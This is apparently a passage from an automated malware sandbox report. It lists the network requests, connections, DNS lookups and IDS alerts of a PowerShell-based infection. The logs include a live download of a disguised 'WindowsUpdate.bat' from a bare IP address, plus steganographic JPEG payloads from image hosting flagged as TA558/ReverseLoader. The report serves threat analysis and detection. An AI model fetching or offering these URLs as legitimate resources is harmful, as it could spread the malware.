5944 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | NL | binary | 814 b | whitelisted
3944 | RUXIMICS.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | NL | binary | 814 b | whitelisted
1268 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | NL | binary | 814 b | whitelisted
 | | POST | 200 | 40.126.31.131:443 | https://login.live.com/RST2.srf | US | xml | 1.24 Kb | unknown
 | | POST | 400 | 20.190.159.130:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | unknown
 | | POST | 400 | 20.190.159.130:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | | | unknown
4832 | powershell.exe | GET | 200 | 206.82.9.203:80 | http://206.82.9.203/WindowsUpdate.bat | US | text | 9.74 Kb | unknown
 | | POST | 400 | 40.126.31.3:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | unknown
 | | POST | 400 | 40.126.31.3:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | | | | whitelisted
5944 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
1268 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3944 | RUXIMICS.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:138 | | | | whitelisted
5944 | MoUsoCoreWorker.exe | 23.216.77.28:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
5944 | MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted
3944 | RUXIMICS.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted
1268 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted
5944 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
whitelisted
google.com
  • 142.250.185.238
whitelisted
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.6
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 184.30.21.171
whitelisted
login.live.com
  • 20.190.159.71
  • 40.126.31.69
  • 20.190.159.4
  • 40.126.31.2
  • 40.126.31.67
  • 40.126.31.3
  • 40.126.31.73
  • 40.126.31.131
whitelisted
i.ibb.co
  • 45.43.142.2
  • 45.43.142.6
  • 45.43.142.4
  • 45.43.142.7
  • 45.43.142.5
  • 45.43.142.3
shared
bitbucket.org
  • 185.166.143.50
  • 185.166.143.49
  • 185.166.143.48
whitelisted
slscr.update.microsoft.com
  • 74.179.77.204
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
self.events.data.microsoft.com
  • 20.42.65.89
whitelisted

Threats

PID | Process | Class | Message
4832 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
6664 | powershell.exe | Not Suspicious Traffic | INFO [ANY.RUN] Image hosting service ImgBB
6664 | powershell.exe | A Network Trojan was detected | PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558)
6664 | powershell.exe | A Network Trojan was detected | ET MALWARE ReverseLoader Reverse Base64 Encoded Executable In Image M2
1936 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
1936 | powershell.exe | A Network Trojan was detected | PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558)
1936 | powershell.exe | A Network Trojan was detected | ET MALWARE ReverseLoader Reverse Base64 Encoded Executable In Image M2
1336 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
5968 | powershell.exe | Not Suspicious Traffic | INFO [ANY.RUN] Image hosting service ImgBB
5968 | powershell.exe | A Network Trojan was detected | PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558)
No debug info